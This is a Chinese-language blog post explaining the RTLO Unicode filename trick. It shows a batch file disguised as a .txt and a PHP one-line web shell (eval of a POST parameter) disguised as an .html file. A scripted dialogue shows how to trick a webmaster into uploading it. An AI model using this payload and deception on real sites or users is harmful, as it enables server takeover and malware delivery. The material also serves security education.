浅谈RTLO技术

我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动 这篇文章,然后就自己去探探究竟,文章地址在下面

传送门

RLO控制符是Unicode控制符的一种,使得字符显示从右至左的顺序,攻击者可以利用RTLO技术来达到欺骗目标,从而使得可执行文件的运行

首先Windows系统在解析文件名时,当遇到unicode控制符时,会改变文件名的显示方式,利用这一特性,可以将exe、scr、com等可执行文件伪装成doc、jpg、txt、ppt等

例如:我首先创建一个bat文件,命名为txt.bat,里面内容写为ping baidu.com,下面就是重点了,我们进行重命名,选择“插入unicode控制字符”,然后就到了这个菜单栏,我们选择RLO,输入txt.bat
<ignore_js_op> <ignore_js_op>

我们可以看到此时文件名已经显示为tab.txt
<ignore_js_op> <ignore_js_op>

不过我们看到它是一个window批处理文件(bat),可以正常执行指令

当然文件的图标方面也是可以修改的,这样可以显得文件的确是一个txt文档,从而诱使目标打开,增加成功几率

简单的一笔

给自己做个记录
 科学研究话题:HTML文件是否可以变为WEBSHELL

测试环境:Linux+Apache+Php
Linux+Nginx+Php

<ignore_js_op>
<ignore_js_op>

从上面2幅图可以看到HTML是没有办法充当一句话的,但是现在我们需要的就是把HTML变为PHP文件,这个可能实现吗?完全有可能!!!这里需要运用到RTLO技术,来进行欺骗,我个人认为目前这种方法适用于社会工程学攻击方面比较得体。

<ignore_js_op>

可以看到运用RTLO技术,我们已经把html.php变为了php.html,这样我们可以用于欺骗。如何欺骗?下面是虚构的一篇对话!当然方法不唯一!

===>攻击者事先把恶意代码放入HTML中(<?php @eval($_POST['sys']);?>)

→攻击者:你是xxx的站长吗?我有一个小广告想挂在你的网站上面。
→站长:嗯,你好,我是xxx的站长。
→攻击者:站长,是这样的,我想先把一个HTML放进去,看看效果,如果效果不错,就可以付款,然后正式开始合作。
→站长:嗯,行,那你把HTML文件传过来吧。
→站长: www.xxx.com/php.html,你看看去吧,如果效果不错,我就去放置了。

其实这个时候php.html文件早以不存在了,而在linux下面它会这样显示?lmth.php,这样它就变为了一个可执行文件php,从而攻击者可以获取到webshell。
为了还原现场,我把已经运用RTLO技术的php.html上传到服务器,由于linux没有unicode控制符这么一说,所以linux会还原为lmth.php(这个为windows下运用RTLO输入时的场景)


<ignore_js_op>

攻击者从而就可以获取到webshell了,www.xxx.com/%3flmth.php。

<ignore_js_op>
标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码